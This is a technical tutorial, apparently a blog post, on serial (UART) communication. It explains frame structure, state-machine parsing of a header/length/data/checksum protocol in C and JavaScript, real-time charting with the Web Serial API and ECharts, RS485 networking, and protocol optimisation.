&lt;p&gt;Serial communication transmits data in “frames.” The standard frame structure (using 8 data bits, 1 stop bit, and no parity as an example) is as follows:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Start Bit (1 bit)&lt;/strong&gt; : A low level (logic 0) that signals the start of a frame, breaking the previous high-level idle state.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Bits (8 bits)&lt;/strong&gt; : Transmitted from the least significant bit (LSB) to the most significant bit (MSB). For example, to send the byte 0x5A (binary 01011010), the actual transmission order is 0→1→0→1→1→0→1→0.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Stop Bit (1 bit)&lt;/strong&gt; : A high level (logic 1) that marks the end of a frame. Configurable as 1, 1.5, or 2 bits, it ensures the receiver has sufficient time to prepare for the next frame.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Example&lt;/strong&gt;: To send the character “A” (ASCII code 0x41, binary 01000001), the complete data frame is:&lt;br&gt;&lt;br&gt;
Start bit (0) → Data bits (1→0→0→0→0→0→1→0) → Stop bit (1)&lt;/p&gt;

&lt;p&gt;The receiver triggers data reception by detecting the “low-level start bit,” then samples subsequent bits synchronously based on the baud rate, and finally reconstructs the complete byte.&lt;/p&gt;
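<p>The LSB-first ordering is easy to get wrong when bit-banging a UART in software. A short sketch that lays out one 8N1 frame in wire order, reproducing the “A” example above, looks like this:</p>

```c
#include <stdint.h>

/* Fill out[0..9] with the wire-order bits of one 8N1 frame:
 * start bit (0), eight data bits LSB-first, stop bit (1).
 * Returns the number of bits written. */
int frame_bits(uint8_t byte, uint8_t out[10])
{
    int n = 0;
    out[n++] = 0;                       /* Start bit (low)      */
    for (int i = 0; i < 8; i++)
        out[n++] = (byte >> i) & 1;     /* Data bits, LSB first */
    out[n++] = 1;                       /* Stop bit (high)      */
    return n;
}
```

<p>For 0x41 (“A”) this yields 0, then 1→0→0→0→0→0→1→0, then 1, the same sequence listed above; for 0x5A it reproduces the 0→1→0→1→1→0→1→0 data order from Section 1.2.</p>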

&lt;h2&gt;
  
  
  II. Serial Protocol Parsing: How to Extract Valid Data from a “Binary Stream”?
&lt;/h2&gt;

&lt;p&gt;In practical projects, serial communication rarely transmits single bytes—it typically sends “data packets” encapsulated in custom protocols (e.g., sensor data, device control commands). Parsing byte-by-byte directly leads to data confusion, so mastering core protocol parsing methods is essential.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Common Custom Serial Protocol Formats
&lt;/h3&gt;

&lt;p&gt;Most projects adopt a protocol structure of “Header + Length + Data + Checksum” to ensure data integrity and identifiability. A typical format is shown below:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;Length (Bytes)&lt;/th&gt;
&lt;th&gt;Function Description&lt;/th&gt;
&lt;th&gt;Example Value&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Start of Frame (SOF)&lt;/td&gt;
&lt;td&gt;1–2&lt;/td&gt;
&lt;td&gt;Identifies the start of a packet to avoid misrecognition&lt;/td&gt;
&lt;td&gt;0xAA (1 byte), 0x55AA (2 bytes)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data Length&lt;/td&gt;
&lt;td&gt;1–2&lt;/td&gt;
&lt;td&gt;Indicates the number of bytes in the subsequent “data segment”&lt;/td&gt;
&lt;td&gt;0x04 (4-byte data segment)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data Segment&lt;/td&gt;
&lt;td&gt;Variable&lt;/td&gt;
&lt;td&gt;Valid data (e.g., sensor values, commands)&lt;/td&gt;
&lt;td&gt;0x00 0x1E 0x00 0x3C (25°C, 60% humidity)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Checksum&lt;/td&gt;
&lt;td&gt;1–2&lt;/td&gt;
&lt;td&gt;Verifies packet integrity&lt;/td&gt;
&lt;td&gt;XOR checksum, CRC16&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;End of Frame (EOF)&lt;/td&gt;
&lt;td&gt;1–2 (Optional)&lt;/td&gt;
&lt;td&gt;Marks the end of a packet&lt;/td&gt;
&lt;td&gt;0xBB&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Why This Structure?&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Suppose a sensor sends temperature and humidity data once per second. Without a header/trailer, the receiver might misidentify “residual data from the previous frame” or “interference noise” as valid data. By using a fixed header (e.g., 0xAA), the receiver first filters out non-header data, extracts the complete data segment based on “data length,” and finally verifies data correctness via the checksum.&lt;/p&gt;
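<p>The checksum in this layout is cheap to compute. The parsing example in Section 2.2 seeds its checksum with the header byte, so the XOR runs over header + length + data; a matching sketch looks like this (applied to the example frame AA 04 00 1E 00 3C it yields 0x8C):</p>

```c
#include <stdint.h>
#include <stddef.h>

/* XOR checksum over header + length + data bytes; the receiver
 * recomputes it the same way and compares against the trailing byte. */
uint8_t xor_checksum(const uint8_t *frame, size_t n)
{
    uint8_t crc = 0;
    for (size_t i = 0; i < n; i++)
        crc ^= frame[i];
    return crc;
}
```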

&lt;h3&gt;
  
  
  2.2 Core Logic of Protocol Parsing: Implementation with a State Machine
&lt;/h3&gt;

&lt;p&gt;The optimal way to parse custom serial protocols is to use a &lt;strong&gt;state machine&lt;/strong&gt;, which processes each field of the data frame through different states to avoid data sticking or loss. Taking the protocol “0xAA (header) + 1-byte length + N-byte data + 1-byte XOR checksum” as an example, the state machine design is as follows:&lt;/p&gt;

&lt;h4&gt;
  
  
  Step 1: Define Parsing States
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Example in C; logic applies to other languages
typedef enum {STATE_WAIT_SOF = 0,  // Wait for header (0xAA)
    STATE_GET_LEN,       // Receive data length
    STATE_GET_DATA,      // Receive data segment
    STATE_GET_CRC,       // Receive checksum
    STATE_CHECK_CRC      // Verify and process data
} ParseState;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Step 2: Process Each Byte of Data by State
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ParseState state = STATE_WAIT_SOF;
uint8_t data_buf[64] = {0};  // Data buffer
uint8_t data_len = 0;        // Length of data segment
uint8_t data_idx = 0;        // Index for data segment reception
uint8_t crc_calc = 0;        // Calculated checksum value

void parse_serial_data(uint8_t byte) {switch(state) {
        case STATE_WAIT_SOF:
            if (byte == 0xAA) {  // Header detected
                state = STATE_GET_LEN;
                crc_calc = byte;  // Initialize checksum with header
            }
            break;

        case STATE_GET_LEN:
            data_len = byte;
            crc_calc ^= byte;  // Accumulate checksum
            if (data_len &amp;gt; 0 &amp;amp;&amp;amp; data_len &amp;lt;= 60) {  // Limit length to prevent buffer overflow
                state = STATE_GET_DATA;
                data_idx = 0;
            } else {state = STATE_WAIT_SOF;  // Reset on invalid length}
            break;

        case STATE_GET_DATA:
            data_buf[data_idx++] = byte;
            crc_calc ^= byte;
            if (data_idx == data_len) {  // Data segment reception complete
                state = STATE_GET_CRC;
            }
            break;

        case STATE_GET_CRC:
            if (byte == crc_calc) {  // Checksum verified
                state = STATE_CHECK_CRC;
            } else {state = STATE_WAIT_SOF;  // Reset on checksum failure}
            break;

        case STATE_CHECK_CRC:
            // Process data after verification (e.g., extract temperature and humidity)
            uint16_t temp = (data_buf[0] &amp;lt;&amp;lt; 8) | data_buf[1];  // Temperature (16-bit)
            uint16_t humi = (data_buf[2] &amp;lt;&amp;lt; 8) | data_buf[3];  // Humidity (16-bit)
            printf("Temperature: %.1f°C, Humidity: %.1f%%\n", temp/10.0, humi/10.0);

            // Reset state to wait for next frame after processing
            state = STATE_WAIT_SOF;
            break;
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key Considerations&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Limit data length to prevent buffer overflow from malicious data.&lt;/li&gt;
&lt;li&gt;  The checksum must include the header, length, and data segment to ensure the integrity of the entire frame.&lt;/li&gt;
&lt;li&gt;  If data reception is incomplete for an extended period (e.g., timeout), reset the state machine to avoid system halts.&lt;/li&gt;
&lt;/ul&gt;
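<p>The timeout reset mentioned above can be sketched as a periodic check. The names (&lt;code&gt;parser_tick&lt;/code&gt;, &lt;code&gt;PARSE_TIMEOUT_MS&lt;/code&gt;, &lt;code&gt;last_byte_ms&lt;/code&gt;) are illustrative rather than part of the article’s code, and a standalone mirror of the parser state is used so the sketch compiles on its own: record a timestamp whenever a byte is consumed, and from a timer tick drop any frame that has stalled mid-reception.</p>

```c
#include <stdint.h>

typedef enum { ST_WAIT_SOF = 0, ST_GET_LEN, ST_GET_DATA, ST_GET_CRC } TickState;

TickState tick_state = ST_WAIT_SOF;  /* Mirrors the parser's state       */
uint32_t last_byte_ms = 0;           /* Set whenever a byte is received  */

enum { PARSE_TIMEOUT_MS = 100 };

/* Call periodically (e.g., from a 1 ms system tick): if a frame has been
 * stuck mid-reception longer than the timeout, reset to wait for a header. */
void parser_tick(uint32_t now_ms)
{
    if (tick_state != ST_WAIT_SOF &&
        (uint32_t)(now_ms - last_byte_ms) > PARSE_TIMEOUT_MS) {
        tick_state = ST_WAIT_SOF;    /* Drop the partial frame */
    }
}
```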

&lt;h2&gt;
  
  
  III. Serial Data Processing and Visualization: From “Byte Stream” to “Intuitive Charts”
&lt;/h2&gt;

&lt;p&gt;After extracting valid data, how can you quickly analyze data trends (e.g., sensor data changes over time)? The traditional method—exporting data to Excel and plotting manually—is highly inefficient. Tools that integrate real-time parsing with visualization significantly improve debugging efficiency.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Core Requirements for Data Visualization: Real-Time Performance and Flexibility
&lt;/h3&gt;

&lt;p&gt;Serial data visualization must meet two core scenarios:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Real-Time Monitoring&lt;/strong&gt;: For example, when debugging environmental monitoring devices, you need to view real-time curves of temperature, humidity, or air pressure.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Historical Review&lt;/strong&gt;: For example, when testing device stability, you need to record data over hours to analyze abnormal fluctuations.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The key to fulfilling these requirements is “linkage between data parsing and chart rendering”—after the parsing module extracts valid data, it transmits it to the chart module in real time, which updates the view based on the timeline.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 Visualization Implementation with JavaScript: From Parsing to Plotting
&lt;/h3&gt;

&lt;p&gt;First, we introduce an online serial tool (&lt;a href="https://serial.devresourcehub.com/" rel="noopener noreferrer"&gt;https://serial.devresourcehub.com&lt;/a&gt;) that supports online serial connection, data transmission/reception, and a powerful plugin system for chart plotting using JavaScript (with the built-in ECharts library for enhanced functionality).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpgv7wr90airwum6qjmig.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpgv7wr90airwum6qjmig.png" width="800" height="318"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Step 1: Serial Connection and Data Reception (Based on Web Serial API)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;let port;
let reader;
let chart;  // Chart instance

// Connect to serial port
async function connectSerial() {port = await navigator.serial.requestPort();
    await port.open({baudRate: 9600});  // Match device baud rate

    // Receive serial data (read byte by byte)
    reader = port.readable.getReader();
    const decoder = new TextDecoder('utf-8');  // Use Uint8Array for binary data
    while (true) {const { value, done} = await reader.read();
        if (done) break;
        const rawData = decoder.decode(value);  // Raw data (e.g., "AA 04 00 1E 00 3C 58")
        parseSerialData(rawData);  // Parse data
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Step 2: Protocol Parsing (Corresponding to the Custom Protocol in Section 2.2)
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;let parseState = "WAIT_SOF";
let dataBuf = [];
let dataLen = 0;
let dataIdx = 0;
let crcCalc = 0;

function parseSerialData(rawData) {// Convert raw string (e.g., "AA 04 00 1E 00 3C 58") to byte array
    const bytes = rawData.split(" ")
                         .map(hex =&amp;gt; parseInt(hex, 16))
                         .filter(byte =&amp;gt; !isNaN(byte));

    bytes.forEach(byte =&amp;gt; {switch(parseState) {
            case "WAIT_SOF":
                if (byte === 0xAA) {
                    parseState = "GET_LEN";
                    crcCalc = byte;
                    dataBuf = [];
                }
                break;
            case "GET_LEN":
                dataLen = byte;
                crcCalc ^= byte;
                if (dataLen &amp;gt; 0 &amp;amp;&amp;amp; dataLen &amp;lt;= 60) {
                    parseState = "GET_DATA";
                    dataIdx = 0;
                } else {parseState = "WAIT_SOF";}
                break;
            case "GET_DATA":
                dataBuf.push(byte);
                crcCalc ^= byte;
                if (dataIdx++ === dataLen - 1) {parseState = "GET_CRC";}
                break;
            case "GET_CRC":
                if (byte === crcCalc) {// Extract temperature and humidity (assume data segment: [temp_high, temp_low, humi_high, humi_low])
                    const temp = (dataBuf[0] &amp;lt;&amp;lt; 8 | dataBuf[1]) / 10.0;
                    const humi = (dataBuf[2] &amp;lt;&amp;lt; 8 | dataBuf[3]) / 10.0;
                    updateChart(temp, humi);  // Update chart
                }
                parseState = "WAIT_SOF";
                break;
        }
    });
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Step 3: Real-Time Chart Rendering with ECharts
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;// Initialize chart
function initChart() {const chartDom = document.getElementById('serial-chart');
    chart = echarts.init(chartDom);

    const option = {title: { text: 'Real-Time Temperature &amp;amp; Humidity Monitoring'},
        tooltip: {trigger: 'axis'},
        legend: {data: ['Temperature (°C)', 'Humidity (%)'] },
        xAxis: {
            type: 'time',
            splitLine: {show: false},
            axisLabel: {formatter: '{hh}:{mm}:{ss}' }  // Time format
        },
        yAxis: [
            {name: 'Temperature (°C)', type: 'value', min: 0, max: 50 },
            {name: 'Humidity (%)', type: 'value', min: 0, max: 100, position: 'right' }
        ],
        series: [
            {name: 'Temperature (°C)',
                type: 'line',
                data: [],
                smooth: true,  // Smooth curve
                yAxisIndex: 0
            },
            {name: 'Humidity (%)',
                type: 'line',
                data: [],
                smooth: true,
                yAxisIndex: 1,
                lineStyle: {color: '#ff4500'}
            }
        ]
    };
    chart.setOption(option);
}

// Update chart data
function updateChart(temp, humi) {const now = new Date();
    const timeStr = now.toISOString();  // Timestamp

    const option = chart.getOption();
    // Limit number of data points (retain only last 10 minutes of data)
    if (option.series[0].data.length &amp;gt; 600) {option.series[0].data.shift();
        option.series[1].data.shift();}
    // Add new data
    option.series[0].data.push([timeStr, temp]);
    option.series[1].data.push([timeStr, humi]);
    chart.setOption(option);
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Practical Application&lt;/strong&gt;: The above logic can be integrated into online serial tools (e.g., browsers supporting the Web Serial API). No local development environment is required—simply open the browser to complete the entire workflow of “serial connection → protocol parsing → real-time plotting,” eliminating the need to rewrite basic code repeatedly.&lt;/p&gt;

&lt;h2&gt;
  
  
  IV. Common Serial Debugging Issues and Solutions
&lt;/h2&gt;

&lt;p&gt;Even with a solid grasp of technical principles, you may encounter various issues during debugging. Below is a troubleshooting guide for high-frequency problems:&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Garbled Received Data: Parameter Mismatch or Voltage Issues
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Troubleshooting Step 1&lt;/strong&gt;: Confirm that the baud rate, data bits, stop bits, and parity bit exactly match the device (mismatched baud rates are the most common cause).&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Troubleshooting Step 2&lt;/strong&gt;: Check if TX/RX pins are reversed (connect device TX to USB module RX, and device RX to USB module TX).&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Troubleshooting Step 3&lt;/strong&gt;: For 3.3V devices, verify that the USB module’s output voltage is compatible (avoid damaging 3.3V devices with 5V levels).&lt;/p&gt;

&lt;h3&gt;
  
  
  4.2 Data Loss or Sticking: Protocol Design or Hardware Issues
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Software Layer&lt;/strong&gt;: Optimize protocol parsing logic (e.g., use a state machine) and add a timeout reset mechanism.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Hardware Layer&lt;/strong&gt;: Check for loose wiring (shielded cables are recommended to reduce interference) and lower the baud rate (high baud rates are prone to interference-induced data loss).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Protocol Layer:&lt;/strong&gt;  If data is sent at a high frequency, add a frame trailer identifier or adopt “fixed frame intervals” (e.g., 10ms between frames) for transmission.&lt;/li&gt;
&lt;/ul&gt;
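&lt;p&gt;The “timeout reset mechanism” mentioned above can be sketched in a few lines of JavaScript. This is a hypothetical helper fed explicit timestamps; the 50 ms inter-byte timeout is an assumed value that should be tuned to the baud rate and frame length:&lt;/p&gt;

```javascript
// A mid-frame stall is detected by comparing the arrival time of the last
// byte with the current time; when the gap exceeds the timeout the parser
// resets to WAIT_SOF so the next 0xAA header can resynchronize the stream.
// (Hypothetical helper; 50 ms is an assumed inter-byte timeout.)
function makeStallDetector(timeoutMs = 50) {
  let lastByteAt = null;
  return {
    onByte(now) { lastByteAt = now; },  // record each byte's arrival time
    stalled(now) {                      // poll periodically from the main loop
      return lastByteAt !== null && now - lastByteAt > timeoutMs;
    },
  };
}

// Usage sketch: on a stall, reset the parser state machine to WAIT_SOF.
const det = makeStallDetector(50);
det.onByte(1000);                // byte arrived at t = 1000 ms
console.log(det.stalled(1030));  // false: only 30 ms elapsed
console.log(det.stalled(1100));  // true: 100 ms gap, resync needed
```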

&lt;h2&gt;
  
  
  V. Advanced Application Scenarios of Serial Communication: Beyond “Debugging”
&lt;/h2&gt;

&lt;p&gt;Serial communication is not limited to “viewing device logs”—in IoT and industrial control, it also plays a core role in data collection and device control. Below are typical advanced scenarios:&lt;/p&gt;

&lt;h3&gt;
  
  
  5.1 Multi-Device Serial Networking: Application of RS485 Bus
&lt;/h3&gt;

&lt;p&gt;When multiple serial devices (e.g., multiple sensors, multiple controllers) need to be connected, point-to-point UART (TX/RX) cannot meet the demand. Instead, the &lt;strong&gt;RS485 bus&lt;/strong&gt; is commonly used for multi-device communication:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Hardware Principle&lt;/strong&gt;: RS485 uses differential signal transmission (two signal lines: A and B), offering far stronger anti-interference capabilities than UART. It supports transmission distances up to 1200 meters and can connect up to 32 devices on the same bus.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Communication Mode&lt;/strong&gt;: Adopts a “master-slave mode,” where the master distinguishes between different slaves via device addresses (e.g., the master sends “0x01 + command,” and only the slave with address 0x01 responds).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Protocol Adaptation&lt;/strong&gt;: Most RS485 devices still communicate based on serial protocols (e.g., Modbus-RTU protocol). Only an “equipment address” field needs to be added to the serial parameters to enable multi-device interaction.&lt;/li&gt;
&lt;/ul&gt;
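&lt;p&gt;As a concrete sketch of the master-slave addressing above, the snippet below builds an addressed request reusing the earlier “header + length + data + XOR checksum” layout, with a one-byte device address as the first data byte. The field layout is an illustrative assumption, not Modbus-RTU (which uses a CRC-16 and its own frame format):&lt;/p&gt;

```javascript
// Sketch: build an addressed request so only the slave with a matching
// address responds. Assumed layout: [0xAA][len][addr][cmd...][xor],
// where the XOR checksum covers every preceding byte.
function buildAddressedFrame(addr, cmdBytes) {
  const payload = [addr, ...cmdBytes];
  const frame = [0xAA, payload.length, ...payload];
  const xor = frame.reduce((acc, b) => acc ^ b, 0);
  frame.push(xor);
  return frame;
}

// A slave only handles frames whose address byte matches its own.
function frameIsForMe(frame, myAddr) {
  return frame[0] === 0xAA && frame[2] === myAddr;
}

const f = buildAddressedFrame(0x01, [0x03, 0x10]); // query device 0x01
console.log(f.map(b => b.toString(16).padStart(2, "0")).join(" "));
console.log(frameIsForMe(f, 0x01)); // true: address matches
console.log(frameIsForMe(f, 0x02)); // false: another slave ignores it
```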

&lt;p&gt;&lt;strong&gt;Tool Assistance&lt;/strong&gt;: When debugging RS485 networked devices, use the “multi-device address configuration” plugin of online serial assistants to quickly switch target device addresses, send commands, and receive responses—no need to manually modify address parameters in the code.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.2 Serial-to-Network Bridging: Enabling Remote Device Monitoring
&lt;/h3&gt;

&lt;p&gt;In IoT scenarios, remote monitoring of serial devices (e.g., sensors in factory workshops, monitoring devices in remote areas) is often required. This is typically achieved using “serial-to-network” modules (e.g., ESP8266, ESP32):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Implementation Logic&lt;/strong&gt;: The module connects to the serial device via UART, converts serial data into TCP/UDP network data, and uploads it to the cloud via WiFi or Ethernet.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Interaction&lt;/strong&gt;: A remote terminal (e.g., a computer or mobile app) sends commands to the module over the network. The module converts the commands into serial data and sends them to the device, while transmitting the device’s response data back to the remote terminal.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Protocol Selection&lt;/strong&gt;: For low power consumption, the MQTT protocol is suitable for data transmission (adapted to IoT scenarios); for real-time performance, direct TCP connection is preferred.&lt;/li&gt;
&lt;/ul&gt;
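&lt;p&gt;The bridging logic boils down to wrapping raw serial bytes in a network-friendly envelope on the way up and unwrapping remote commands on the way back. A minimal sketch (the JSON field names &lt;code&gt;deviceId&lt;/code&gt;, &lt;code&gt;ts&lt;/code&gt;, and &lt;code&gt;payloadHex&lt;/code&gt; are illustrative assumptions, not a standard):&lt;/p&gt;

```javascript
// Sketch: wrap raw serial bytes into a JSON envelope a TCP/MQTT bridge
// could forward, and unwrap a remote command back into bytes.
// Field names are illustrative assumptions.
function serialToNet(deviceId, bytes) {
  return JSON.stringify({
    deviceId,
    ts: Date.now(),
    payloadHex: bytes.map(b => b.toString(16).padStart(2, "0")).join(""),
  });
}

function netToSerial(message) {
  const { payloadHex } = JSON.parse(message);
  const bytes = [];
  for (let i = 0; i < payloadHex.length; i += 2) {
    bytes.push(parseInt(payloadHex.slice(i, i + 2), 16));
  }
  return bytes;
}

const msg = serialToNet("sensor-01", [0xAA, 0x04, 0x1E]);
console.log(netToSerial(msg)); // round-trips back to [170, 4, 30]
```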

&lt;p&gt;&lt;strong&gt;Debugging Tip&lt;/strong&gt;: Use the “network serial bridging” function of online serial assistants to connect directly to a remote TCP server via a browser, receive network data from serial devices, and visualize it in real time—no need to deploy complex network debugging tools locally.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.3 Serial Data Storage and Playback: Retracing Debugging Processes
&lt;/h3&gt;

&lt;p&gt;In scenarios such as device stability testing or fault diagnosis, serial data needs to be recorded and played back for post-analysis. The traditional method—saving data as a TXT file via serial tools and analyzing it manually—is inefficient:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Efficient Solution&lt;/strong&gt;: Online serial assistants support saving serial data as JSON files in the format of “timestamp + data content,” including raw data, parsed data, and chart data.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Playback&lt;/strong&gt;: During playback, the tool plays back data frame by frame at the original time interval, synchronously updating charts and parsing results to simulate real communication processes and quickly locate data anomalies when faults occur.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Data Filtering&lt;/strong&gt;: Supports filtering data by time range and data type (e.g., commands, responses, abnormal data) to focus on key debugging nodes.&lt;/li&gt;
&lt;/ul&gt;
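&lt;p&gt;The “timestamp + data content” record format and time-range filtering described above reduce to plain JSON handling. A minimal sketch, assuming each frame is stored as a &lt;code&gt;{ ts, raw, parsed }&lt;/code&gt; object (the field names are illustrative):&lt;/p&gt;

```javascript
// Sketch: store each frame as { ts, raw, parsed } and filter a recording
// by time range for playback. Field names are illustrative assumptions.
function recordFrame(log, ts, raw, parsed) {
  log.push({ ts, raw, parsed });
  return log;
}

function filterByTimeRange(log, fromTs, toTs) {
  return log.filter(e => e.ts >= fromTs && e.ts <= toTs);
}

const log = [];
recordFrame(log, 1000, "AA 04 00 1E 00 3C 58", { temp: 3.0, humi: 6.0 });
recordFrame(log, 2000, "AA 04 00 FF 00 3C 58", { temp: 25.5, humi: 6.0 });
recordFrame(log, 9000, "AA 04 00 1E 00 3C 58", { temp: 3.0, humi: 6.0 });
console.log(filterByTimeRange(log, 1500, 8000).length); // 1 frame in range
```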

&lt;h2&gt;
  
  
  VI. Optimization of Serial Protocols: Improving Communication Efficiency and Reliability
&lt;/h2&gt;

&lt;p&gt;As device complexity increases, basic “header + length + data + checksum” protocols may no longer meet requirements. Protocol design needs to be optimized in the following dimensions:&lt;/p&gt;

&lt;h3&gt;
  
  
  6.1 Data Compression: Reducing Bandwidth Usage
&lt;/h3&gt;

&lt;p&gt;When serial devices transmit large volumes of data (e.g., continuous waveform data collected by sensors), uncompressed data occupies significant bandwidth and causes transmission delays:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Compression Algorithm Selection&lt;/strong&gt;: For data with large repetitions (e.g., consecutive 0x00), Run-Length Encoding (RLE) is suitable; for numerical data (e.g., temperature, voltage), differential encoding (storing the difference between adjacent data points) is preferred.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Protocol Adaptation&lt;/strong&gt;: Add a “compression flag” field (1 bit) to the protocol to indicate whether data is compressed. The receiver decides whether to decompress based on the flag.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Example&lt;/strong&gt;: For continuous temperature data “25.1, 25.2, 25.1, 25.3,” differential encoding converts it to “25.1, +0.1, -0.1, +0.2,” reducing data length.&lt;/li&gt;
&lt;/ul&gt;
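&lt;p&gt;The differential-encoding example in the list above is easy to make concrete. A minimal sketch that scales values to x10 fixed point (matching the article’s 0.1-precision temperatures) so the deltas stay exact; a real implementation would also bound the delta width:&lt;/p&gt;

```javascript
// Sketch of differential encoding for numeric series: store the first
// value, then only the deltas between adjacent points. Values are scaled
// to x10 integers first so the deltas stay exact.
function diffEncode(values) {
  const scaled = values.map(v => Math.round(v * 10));
  const out = [scaled[0]];
  for (let i = 1; i < scaled.length; i++) out.push(scaled[i] - scaled[i - 1]);
  return out;
}

function diffDecode(encoded) {
  const scaled = [encoded[0]];
  for (let i = 1; i < encoded.length; i++) scaled.push(scaled[i - 1] + encoded[i]);
  return scaled.map(v => v / 10);
}

const enc = diffEncode([25.1, 25.2, 25.1, 25.3]);
console.log(enc);             // [251, 1, -1, 2]  (x10 fixed point)
console.log(diffDecode(enc)); // [25.1, 25.2, 25.1, 25.3]
```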

&lt;p&gt;&lt;strong&gt;Tool Support&lt;/strong&gt;: The “data compression/decompression” plugin of online serial assistants can automatically identify compression flags, decompress data in real time, and visualize it—no manual compression handling is required.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.2 Batch Transmission of Multiple Commands: Improving Control Efficiency
&lt;/h3&gt;

&lt;p&gt;When controlling multiple devices or performing complex operations, multiple serial commands need to be sent. Manual one-by-one transmission is time-consuming and error-prone:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Batch Transmission Solution&lt;/strong&gt;: Design a “batch command packet” protocol, where multiple commands are concatenated in the format of “command length + command content.” A “batch flag” is added to the header, and the receiver parses and executes commands one by one.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Command Priority&lt;/strong&gt;: Add a “priority” field (e.g., levels 0–3) to batch commands. The receiver executes commands by priority to ensure critical commands (e.g., emergency stop commands) are executed first.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Execution Feedback&lt;/strong&gt;: After executing each command, the receiver returns “execution results” (success/failure + error code). The master determines whether to proceed to the next command based on the feedback.&lt;/li&gt;
&lt;/ul&gt;
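&lt;p&gt;The “command length + command content” concatenation can be sketched as follows; the packet layout (a leading command count, then length-prefixed commands) is an assumption for illustration:&lt;/p&gt;

```javascript
// Sketch: pack several commands into one batch packet as
// [count][len1][cmd1 bytes...][len2][cmd2 bytes...]... and unpack them
// on the receiver. The layout is illustrative, not a standard.
function packBatch(commands) {
  const out = [commands.length];
  for (const cmd of commands) out.push(cmd.length, ...cmd);
  return out;
}

function unpackBatch(packet) {
  const commands = [];
  let i = 1; // skip the command-count byte
  for (let n = 0; n < packet[0]; n++) {
    const len = packet[i++];
    commands.push(packet.slice(i, i + len));
    i += len;
  }
  return commands;
}

const batch = packBatch([[0x01, 0x10], [0x02], [0x03, 0x20, 0x30]]);
console.log(unpackBatch(batch)); // recovers the three original commands
```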

